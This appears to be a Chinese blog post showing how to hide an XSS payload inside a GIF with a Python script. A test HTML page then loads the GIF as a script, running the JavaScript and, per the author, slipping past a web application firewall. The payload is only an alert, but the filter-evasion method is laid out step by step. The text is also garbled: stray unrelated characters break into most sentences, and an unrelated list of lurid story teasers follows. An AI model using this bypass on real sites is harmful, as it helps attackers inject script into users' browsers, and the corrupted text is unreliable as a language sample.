通過(guò)圖片觸發(fā)XssPayload從而繞過(guò)WAF

假設(shè)如果XSS的PayLoad被攔截,那么把XSS的PayLoad放到載體里面,這樣會(huì)不會(huì)Bypass呢懈玻?

一個(gè)正常的gif圖片加上一個(gè)XSS的PayLoad丹鸿,然后通過(guò)腳本將XssPayload注入到圖片里面:

利用Python腳本將PayLoad注入到圖片里面

python jsingif.py -i hack.gif "javascript:alert('Power_Liu')"

圖片

然后用記事本打開(kāi)圖片看看:


圖片

可以看出:圖片末尾有這樣一串代碼:*/=1;javascript:alert('Power_Liu');
為了驗(yàn)證這個(gè)XSS是否生效,這里用到Html測(cè)試代碼:

<html>
<head>
<title>Power_Liu—Test-XSS</title>
</head>
<body>
    <img src="hack.gif"\>
    <script src= "hack.gif"> </script>
</body>
</html> 
</html>

打開(kāi)后的testxss.html:


圖片

script標(biāo)簽把圖片當(dāng)成JavaScript代碼執(zhí)行了缓呛,因?yàn)槲覀儼褋y碼的數(shù)據(jù)通過(guò)多行注釋/**/給注釋掉了催享,所以JavaScript會(huì)執(zhí)行我們的PayLoad,這樣可以繞過(guò)WAF

By:Power_Liu
Qq:211124332
文章地址:博客
)

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
  • 序言:七十年代末哟绊,一起剝皮案震驚了整個(gè)濱河市因妙,隨后出現(xiàn)的幾起案子,更是在濱河造成了極大的恐慌票髓,老刑警劉巖攀涵,帶你破解...
    沈念sama閱讀 221,888評(píng)論 6 515
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件,死亡現(xiàn)場(chǎng)離奇詭異洽沟,居然都是意外死亡以故,警方通過(guò)查閱死者的電腦和手機(jī),發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 94,677評(píng)論 3 399
  • 文/潘曉璐 我一進(jìn)店門(mén)裆操,熙熙樓的掌柜王于貴愁眉苦臉地迎上來(lái)怒详,“玉大人,你說(shuō)我怎么就攤上這事踪区±ニ福” “怎么了?”我有些...
    開(kāi)封第一講書(shū)人閱讀 168,386評(píng)論 0 360
  • 文/不壞的土叔 我叫張陵缎岗,是天一觀的道長(zhǎng)静尼。 經(jīng)常有香客問(wèn)我,道長(zhǎng),這世上最難降的妖魔是什么鼠渺? 我笑而不...
    開(kāi)封第一講書(shū)人閱讀 59,726評(píng)論 1 297
  • 正文 為了忘掉前任鸭巴,我火速辦了婚禮,結(jié)果婚禮上系冗,老公的妹妹穿的比我還像新娘奕扣。我一直安慰自己,他們只是感情好掌敬,可當(dāng)我...
    茶點(diǎn)故事閱讀 68,729評(píng)論 6 397
  • 文/花漫 我一把揭開(kāi)白布惯豆。 她就那樣靜靜地躺著,像睡著了一般奔害。 火紅的嫁衣襯著肌膚如雪楷兽。 梳的紋絲不亂的頭發(fā)上,一...
    開(kāi)封第一講書(shū)人閱讀 52,337評(píng)論 1 310
  • 那天华临,我揣著相機(jī)與錄音芯杀,去河邊找鬼。 笑死雅潭,一個(gè)胖子當(dāng)著我的面吹牛揭厚,可吹牛的內(nèi)容都是我干的。 我是一名探鬼主播扶供,決...
    沈念sama閱讀 40,902評(píng)論 3 421
  • 文/蒼蘭香墨 我猛地睜開(kāi)眼筛圆,長(zhǎng)吁一口氣:“原來(lái)是場(chǎng)噩夢(mèng)啊……” “哼!你這毒婦竟也來(lái)了椿浓?” 一聲冷哼從身側(cè)響起太援,我...
    開(kāi)封第一講書(shū)人閱讀 39,807評(píng)論 0 276
  • 序言:老撾萬(wàn)榮一對(duì)情侶失蹤,失蹤者是張志新(化名)和其女友劉穎扳碍,沒(méi)想到半個(gè)月后提岔,有當(dāng)?shù)厝嗽跇?shù)林里發(fā)現(xiàn)了一具尸體,經(jīng)...
    沈念sama閱讀 46,349評(píng)論 1 318
  • 正文 獨(dú)居荒郊野嶺守林人離奇死亡笋敞,尸身上長(zhǎng)有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點(diǎn)故事閱讀 38,439評(píng)論 3 340
  • 正文 我和宋清朗相戀三年碱蒙,在試婚紗的時(shí)候發(fā)現(xiàn)自己被綠了。 大學(xué)時(shí)的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片液样。...
    茶點(diǎn)故事閱讀 40,567評(píng)論 1 352
  • 序言:一個(gè)原本活蹦亂跳的男人離奇死亡振亮,死狀恐怖,靈堂內(nèi)的尸體忽然破棺而出鞭莽,到底是詐尸還是另有隱情坊秸,我是刑警寧澤,帶...
    沈念sama閱讀 36,242評(píng)論 5 350
  • 正文 年R本政府宣布澎怒,位于F島的核電站褒搔,受9級(jí)特大地震影響阶牍,放射性物質(zhì)發(fā)生泄漏。R本人自食惡果不足惜星瘾,卻給世界環(huán)境...
    茶點(diǎn)故事閱讀 41,933評(píng)論 3 334
  • 文/蒙蒙 一走孽、第九天 我趴在偏房一處隱蔽的房頂上張望。 院中可真熱鬧琳状,春花似錦磕瓷、人聲如沸。這莊子的主人今日做“春日...
    開(kāi)封第一講書(shū)人閱讀 32,420評(píng)論 0 24
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽(yáng)。三九已至翎承,卻和暖如春硕盹,著一層夾襖步出監(jiān)牢的瞬間,已是汗流浹背叨咖。 一陣腳步聲響...
    開(kāi)封第一講書(shū)人閱讀 33,531評(píng)論 1 272
  • 我被黑心中介騙來(lái)泰國(guó)打工瘩例, 沒(méi)想到剛下飛機(jī)就差點(diǎn)兒被人妖公主榨干…… 1. 我叫王不留,地道東北人甸各。 一個(gè)月前我還...
    沈念sama閱讀 48,995評(píng)論 3 377
  • 正文 我出身青樓垛贤,卻偏偏與公主長(zhǎng)得像,于是被迫代替她去往敵國(guó)和親趣倾。 傳聞我的和親對(duì)象是個(gè)殘疾皇子南吮,可洞房花燭夜當(dāng)晚...
    茶點(diǎn)故事閱讀 45,585評(píng)論 2 359

推薦閱讀更多精彩內(nèi)容

  • 之前積累了XSS 有一段時(shí)間,因?yàn)槟壳伴_(kāi)始了一件有趣的工程誊酌,需要整合非常多的知識(shí),其中Web 安全這一塊出現(xiàn)最多的...
    刀背藏身閱讀 9,077評(píng)論 0 16
  • 前言 這是比較簡(jiǎn)單的xss練習(xí)小游戲露乏,非常適合入門(mén)碧浊。一直以來(lái),對(duì)xss的內(nèi)容總感覺(jué)有一些屏障瘟仿,應(yīng)該是因?yàn)閯?dòng)手實(shí)踐太...
    煊奕閱讀 2,858評(píng)論 0 2
  • 寫(xiě)在前面 文章內(nèi)容參考自https://twosecurity.io/http://www.4hou.com/we...
    Ackerzy閱讀 5,471評(píng)論 0 9
  • 本篇文章介紹如何從常規(guī)攻擊的防御能力來(lái)評(píng)測(cè)一款WAF箱锐。一共覆蓋了十六種攻擊類(lèi)型,每種類(lèi)型均從利用場(chǎng)景(攻擊操作的目...
    生活的探路者閱讀 1,273評(píng)論 0 4
  • 一劳较、SQL注入(注入) 1. 利用場(chǎng)景 從攻擊者進(jìn)行SQL注入的階段來(lái)看驹止,一般分為探測(cè)與攻擊兩個(gè)階段(p.s.攻擊...
    LizPL閱讀 2,369評(píng)論 0 0